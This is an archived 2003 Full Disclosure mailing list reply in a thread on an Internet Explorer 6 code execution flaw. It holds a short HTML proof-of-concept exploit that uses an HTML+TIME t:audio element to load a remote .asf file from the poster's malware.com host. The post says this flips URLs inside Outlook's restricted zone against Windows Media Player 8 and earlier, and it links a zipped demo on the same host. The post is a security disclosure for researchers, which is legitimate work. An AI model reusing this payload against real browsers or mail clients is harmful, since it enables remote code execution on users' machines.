Full Disclosure mailing list archives

Re: Internet explorer 6 on windows XP allows exection of arbitrary code

From: "http-equiv () excite com" <1 () malware com>
Date: Fri, 12 Sep 2003 15:55:50 -0000



<!-- 

when viewing mail in recent versions of outlook it operates in the
restricted zone ,eg no active scripting allowed to run, so these wont 
be exploitable unless someone proofs otherwise that is ;)

 -->

<html xmlns:t>
<head><style>
t\:*{behavior:url(#default#time);display:none}</style></head><body>
<t:audio  t:src="http://www.malware.com/freek.asf";  />
</body></html>

Trivial inline url flip in the restricted zone. WMP 8 and under. 
Unpatched since May 2003 should do the trick:

http://www.malware.com/but.its.free.zip 

-- 
http://www.malware.com



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Current thread:

Internet explorer 6 on windows XP allows exection of arbitrary code jelmer (Sep 11)
- Re: Internet explorer 6 on windows XP allows exection of arbitrary code Kristian Hermansen (Sep 11)
  - Re: Internet explorer 6 on windows XP allows exection of arbitrary code jelmer (Sep 12)
- Re: Internet explorer 6 on windows XP allows exection of arbitrary code Thor Larholm (Sep 11)
  - Re: Internet explorer 6 on windows XP allows exection of arbitrary code jelmer (Sep 12)
- RE: Internet explorer 6 on windows XP allows exection of arbitrary code Richard M. Smith (Sep 12)
- Re: Internet explorer 6 on windows XP allows exection of arbitrary code Dj MegaWorld (Sep 12)
- <Possible follow-ups>
- Re: Internet explorer 6 on windows XP allows exection of arbitrary code http-equiv () excite com (Sep 12)
  - RE: Internet explorer 6 on windows XP allows exection of arbitrary code Richard M. Smith (Sep 12)
- RE: Internet explorer 6 on windows XP allows exection of arbitrary code Drew Copley (Sep 12)